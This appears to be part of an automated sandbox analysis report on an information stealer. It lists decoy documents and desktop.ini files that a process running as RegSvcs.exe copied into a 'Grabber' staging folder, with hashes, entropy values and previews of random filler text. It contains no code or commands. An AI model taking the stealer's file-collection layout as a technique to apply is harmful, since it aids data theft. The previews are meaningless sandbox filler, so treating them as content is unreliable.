SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LHEPQPGEWF.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694579526837108
Encrypted:	false
SSDEEP:	24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
MD5:	2DB1C5AA015E3F413D41884AC02B89BC
SHA1:	4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
SHA-256:	956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
SHA-512:	C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
Malicious:	false
Preview:	LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LIJDSFKJZG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LIJDSFKJZG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\NIRMEKAMZH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
